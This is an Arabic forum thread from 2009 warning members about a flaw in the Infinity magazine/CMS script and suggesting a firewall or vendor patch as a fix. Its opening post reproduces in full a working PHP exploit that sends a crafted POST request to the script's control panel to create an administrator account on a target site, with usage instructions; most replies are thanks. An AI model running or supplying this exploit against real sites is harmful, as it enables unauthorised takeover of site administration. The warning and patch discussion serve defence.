التميز خلال 24 ساعة
 العضو الأكثر نشاطاً هذا اليوم   الموضوع النشط هذا اليوم   المشرف المميزلهذا اليوم    المشرفة المميزه 

شكرا الجوري
بقلم : سحابة ديم
قريبا

تتوالى مسيرة العطاء هنا في بعد حيي الى ان يحين قطاف الثمر فيطيب المذاق وتتراكض الحروف وتتراقص النغمات عبر كلماتكم ونبض مشاعركم وسنا اقلامكم وصدق ابجدياتكم ونقآء قلوبكم وطهر اصالتكم فآزهرت بها اروقة المنتدى واينعت . فانتشت الارواح بعطر اقلامكم الآخاذ و امتزجت ببساطة الروح وعمق المعنى ورقي الفكر .. هذا هو آنتم دانه ببحر بعد حيي تتلألأ بانفراد وتميز فلا يمكن لمداها العاصف ان يتوقف ولا لانهارها ان تجف ولا لشمس ابداعها ان تغرب.لذلك معا نصل للمعالي ونسمو للقمم ..... دمتم وطبتم دوما وابدا ....... (منتديات بعد حيي).. هنا في منتديات بعد حيي يمنع جميع الاغاني ويمنع اي صور غير لائقه او تحتوي على روابط منتديات ويمنع وضع اي ايميل بالتواقيع .. ويمنع اي مواضيع فيها عنصريه قبليه او مذهبيه منعا باتاا .....اجتمعنا هنا لنكسب الفائده وليس لنكسب الذنوب وفق الله المسلمين للتمسك بدينهم والبصيرة في أمرهم إنه قريب مجيب جزاكم الله خير ا ........ كل الود لقلوبكم !! كلمة الإدارة

منتدى المعتكف الأدبي
عدد مرات النقر : 13
عدد  مرات الظهور : 869,129

 
العودة   منتديات بعد حيي > المــــنتديات التقنيـــــة > منتدى الكمبيوتر والإنترنت - وتطوير المنتديات

 

« آخـــر الـــمـــشـــاركــــات »
         :: شهر الخير جاء هلا هلا (آخر رد :ذيب اجا)       :: بين شعورٍ وكلمة (آخر رد :نايف سلمى)       :: ........ نايفات ........ (آخر رد :نايف سلمى)       :: $$ يهمه الغدر ما همه سلامة روح $$ (آخر رد :ابو طارق الشمري)       :: وجهة نظر (آخر رد :الجوري)       :: #((أمسي سامر النجمات لأن روحي غدى محروق))# (آخر رد :شبام)       :: [ .. إعتذارات رُبما تصل .. ] (آخر رد :بنت السحاب)       :: ديوان رسائل من المقهى - إلى وجهتك. (آخر رد :بنت السحاب)       :: مزرعتي.... (آخر رد :الفلاح)       :: اخبار عامة السعودية اليوم (آخر رد :فرح الايام)      

الإهداءات
فرح الايام من من مكة : كويتية: «جمعة مباركة يا الغاليين، الله يسعد قلوبكم ويجعل هالجمعة خفيفة على الروح 🤍     نسمات من ذكر : سبحان الله وبحمده عدد خلقه ورضا نفسه وزنة عرشه ومداد كلماته     رهينك ياحياتي من الصالة : مغرور رد علي او. بسويههااا     فرح الايام من من بعد حي : مشكور اخوي الساري لدعمك واتمنى لك الاذدهار     سها من الرياض : شكرا ابو طارق عساك للعافيه يارب     الـ ساري من بعد حيكم : شكر خاص للاخت فرح الايام على جهودها بالاخبار والاحداث بارك الله فيك الله يستر عليك اختي على التغطيه الدائمة    

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 08-16-2009, 01:45 AM   #1


الصورة الرمزية مخاوي الكيبورد
مخاوي الكيبورد غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 13918
 تاريخ التسجيل :  Jun 2009
 أخر زيارة : 08-07-2010 (07:08 AM)
 المشاركات : 161 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue
[ ترقيع ] ثغرة بمجلة الانفنتي !



http://milw0rm.com/exploits/9159
Infinity <= 2.0.5 Arbitrary Create Admin Exploit

كود PHP:
          <?php
print_r
('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .

                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
[q] Infinity <= 2.0.5 Create Admin __/QQQ/````````````````\QQQ\___
                                 _/QQQQQ/                  \QQQQQQ\
[q] _POST <3                    /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] Owned :)                  |QQQQ/    By  Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[WHAT?]-                \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                         ```````````````````     `````
 ______________________________________________________________________________
/                                                                              \
|       :: Stupid vulnerability in a good script :( tsk tsk                    |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                                    Sec-Code.com
                                    

USAGE: php whatever.php localhost /infinity/


'
);

ini_set("max_execution_time",0);

 function 
QABANDI($victim,$vic_dir){
$host $victim;
$p "http://".$host.$vic_dir;




          
$data   ="name=qabandi&password=qabandi&conf_password=qabandi&email=[COLOR=red] ( تم حذف البريد لأن عرضه مخالف لشروط المنتدى ) [/COLOR]&nat=man&hoppy=QabandiWasHere&text=QabandiWasHere&country=1";
          
$packet ="POST ".$p."/cp/profile.php?action=donewauthor HTTP/1.0\r\n";
          
$packet.="****************************-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="****************************-Length: ".strlen($data)."\r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
$packet.=$data;



         
//print $packet;
    
$o = @fsockopen($host80);
    if(!
$o){
        echo 
"\n[x] No response...\n";
        die;
    }
    
    
fputs($o$packet);
    while (!
feof($o)) $data .= fread($o1024);
    
fclose($o);
    
    
$_404 strstr$data"HTTP/1.1 404 Not Found" );
    if ( !empty(
$_404) ){
        echo 
"\n[x] 404 Not Found... Make sure of path. \n";
        die;
    }
    
        
$_401 strstr$data"401 Authorization Required" );
    if ( !empty(
$_401) ){
        echo 
"\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n";
        die;
    }
                                          
                                           echo 
"Admin created !\n\nUsername: qabandi\npassword: qabandi";

 }

$host1 $argv[1];
$userdir1=$argv[2];
QABANDI($host1,$userdir1);

die;


?>
حياكم الله ..
ثغرة نزلت بتاريخ 2009-07-15 وللاسف فيه مواقع عربية مصابة للحين ..
خطورة الثغرة : عرض password & user الادمن
ترقيع الثغرة المؤقت : وضع جدار ناري على لوحة تحكم السكربت
فـ بالتالي ماراح يشتغل اكسبلويت الثغرة اللي فوق وماراح تعطي اي نتيجة
الله يحفظكمـ انتمـ ومواقع المسلمين ..
مكتشف الثغرة واحد من الاصدقاء
./ مخاوي الكيبورد




 

رد مع اقتباس
قديم 08-16-2009, 02:57 AM   #2


الصورة الرمزية مشعل الليل
مشعل الليل غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 3157
 تاريخ التسجيل :  Jun 2006
 أخر زيارة : 08-24-2014 (06:12 AM)
 المشاركات : 112 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


شكرا على التنبيه بارك فيك اخي



 

رد مع اقتباس
قديم 08-16-2009, 03:46 AM   #3
واحشني زمانك


الصورة الرمزية نورالدنيا
نورالدنيا غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 5452
 تاريخ التسجيل :  Aug 2007
 أخر زيارة : اليوم (12:38 AM)
 المشاركات : 16,091 [ + ]
 التقييم :  10076
 الدولهـ
Saudi Arabia
 الجنس ~
Female
لوني المفضل : Deepskyblue

معرض الوسام




[align=center]



الله يكفينا شرها

ومشكور اخوي على التنبيه



[/align]




 
 توقيع : نورالدنيا



رد مع اقتباس
قديم 08-16-2009, 04:40 AM   #4


الصورة الرمزية الخريصي
الخريصي غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 3502
 تاريخ التسجيل :  Oct 2006
 أخر زيارة : 04-06-2015 (03:21 AM)
 المشاركات : 152 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .



 

رد مع اقتباس
قديم 08-16-2009, 05:46 AM   #5

مشرفة سابقه



الصورة الرمزية محبة الجنه
محبة الجنه غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 13067
 تاريخ التسجيل :  Feb 2009
 أخر زيارة : 07-22-2010 (04:44 PM)
 المشاركات : 4,929 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .



 
 توقيع : محبة الجنه




رد مع اقتباس
قديم 08-16-2009, 12:29 PM   #6


الصورة الرمزية شموخ المحبة
شموخ المحبة غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 14482
 تاريخ التسجيل :  Aug 2009
 أخر زيارة : 08-31-2012 (01:05 PM)
 المشاركات : 709 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue

معرض الوسام



مشكورة الله يعطيك العافية



 

رد مع اقتباس
قديم 08-16-2009, 05:21 PM   #7


الصورة الرمزية مناهي
مناهي غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 4998
 تاريخ التسجيل :  Jun 2007
 أخر زيارة : 11-30-2015 (09:39 PM)
 المشاركات : 18,732 [ + ]
 التقييم :  80
 MMS ~
MMS ~
لوني المفضل : Cadetblue


الله يستر
مخاوي الكيبورد
مشكور على التنبية
والله يعطيكـ العافية



 
 توقيع : مناهي



رد مع اقتباس
قديم 08-17-2009, 03:53 AM   #8


الصورة الرمزية الاخينع
الاخينع غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 13844
 تاريخ التسجيل :  Jun 2009
 أخر زيارة : 02-26-2011 (04:33 PM)
 المشاركات : 8 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


لازم الاخذ بالحيطه والحذرتقبل مروري مع كل تقدير واحترام لشخصكم الكريم



 

رد مع اقتباس
قديم 08-17-2009, 06:30 AM   #9

مآعآد بدري ..!



الصورة الرمزية جـــود
جـــود غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 7479
 تاريخ التسجيل :  Jun 2008
 أخر زيارة : 08-23-2022 (06:15 PM)
 المشاركات : 13,899 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue

معرض الوسام



مخاوي الكيبورد

الله يكفينا شرها

مشكووور على التنبيه

جود



 
 توقيع : جـــود

لا إله إلا أنت سبحانك إني كنت من الظالمين


رد مع اقتباس
قديم 08-17-2009, 07:55 AM   #10
طروادا
الزوار


الصورة الرمزية طروادا

بيانات اضافيه [ + ]
 رقم العضوية :
 أخر زيارة : 01-01-1970 (03:00 AM)
 المشاركات : n/a [ + ]
لوني المفضل : Cadetblue


استاذ مخاوي انت تقول (ترقيع الثغرة المؤقت )ماهو الحل المناسب برائيك للمشكله ؟؟؟
هل يتطلب نقل الموقع الى سير فر اخر اكثر حمايه ؟؟
وياليت نسمع رد الاخوان بالدعم الفني بمنتدى بعد حيي حول هذي المشكله
دمت مبدعاً استاذ مخاوي



 

رد مع اقتباس
قديم 08-17-2009, 08:52 AM   #11


الصورة الرمزية مخاوي الكيبورد
مخاوي الكيبورد غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 13918
 تاريخ التسجيل :  Jun 2009
 أخر زيارة : 08-07-2010 (07:08 AM)
 المشاركات : 161 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


اقتباس:
المشاركة الأصلية كتبت بواسطة طروادا
   استاذ مخاوي انت تقول (ترقيع الثغرة المؤقت )ماهو الحل المناسب برائيك للمشكله ؟؟؟
هل يتطلب نقل الموقع الى سير فر اخر اكثر حمايه ؟؟
وياليت نسمع رد الاخوان بالدعم الفني بمنتدى بعد حيي حول هذي المشكله
دمت مبدعاً استاذ مخاوي

اهلين بالحبيب ..
اقصد بالترقيع الموقت حل مبدئ للثغرة من نظري يكون سهل على كل مستخدمين المجله
السيرفر ماله اي دخل لو نقلت الموقع المصاب على اقوى سيرفر بالعالم راح يضل مصاب
لان الثغرة بملفات الموقع ماهي بالسيرفر ..
طبعا شركة ابعاد المعلومات منتجة مجلة انفنتي اخبرها طرحت اكواد برمجيها ( ترقيع ) للملف المصاب بالسكربت
على مايقولون كل الطرق تودئ الى روما ( جدار ناري او ترقيع برمجي ) كلها تمنع تطبيق الثغرة اعلاه ..
نورت



 

رد مع اقتباس
قديم 08-18-2009, 04:45 PM   #12


الصورة الرمزية الـ ساري
الـ ساري غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 15
 تاريخ التسجيل :  Apr 2004
 أخر زيارة : 01-28-2026 (12:59 PM)
 المشاركات : 12,255 [ + ]
 التقييم :  36359
لوني المفضل : Cadetblue


بارك فيك ورعاك وحفظك الله على التحذير
الذي عانينا منه
بيوم من الايام
اشكرك وفقك الله ودمت لنا غالينا



 

رد مع اقتباس
قديم 08-18-2009, 10:56 PM   #13


الصورة الرمزية ياسر العلهوب
ياسر العلهوب غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 12913
 تاريخ التسجيل :  Jan 2009
 أخر زيارة : 04-17-2013 (02:39 PM)
 المشاركات : 300 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


شكرا على التنبيه بارك فيك اخي





 
 توقيع : ياسر العلهوب



رد مع اقتباس
قديم 08-20-2009, 04:09 AM   #14


الصورة الرمزية تنوره
تنوره غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 3737
 تاريخ التسجيل :  Nov 2006
 أخر زيارة : 05-14-2011 (11:19 PM)
 المشاركات : 21 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue


موفق بإذن الله ... لك مني أجمل تحية .



 

رد مع اقتباس
قديم 08-21-2009, 01:54 AM   #15


الصورة الرمزية حايليه
حايليه غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 7212
 تاريخ التسجيل :  Apr 2008
 أخر زيارة : 01-23-2026 (08:34 AM)
 المشاركات : 447 [ + ]
 التقييم :  2822
لوني المفضل : Cadetblue


تسلم ومشكور اخوي على التنبيه



 

رد مع اقتباس
إضافة رد


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

(عرض الكل الاعضاء الذين شاهدو هذا الموضوع: 2
,

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 07:44 PM.


Powered by vBulletin® Copyright ©2000 - 2026, Jelsoft Enterprises Ltd. TranZ By Almuhajir
HêĽм √ 3.2 OPS BY: ! ωαнαм ! © 2010
Ads Organizer 3.0.3 by Analytics - Distance Education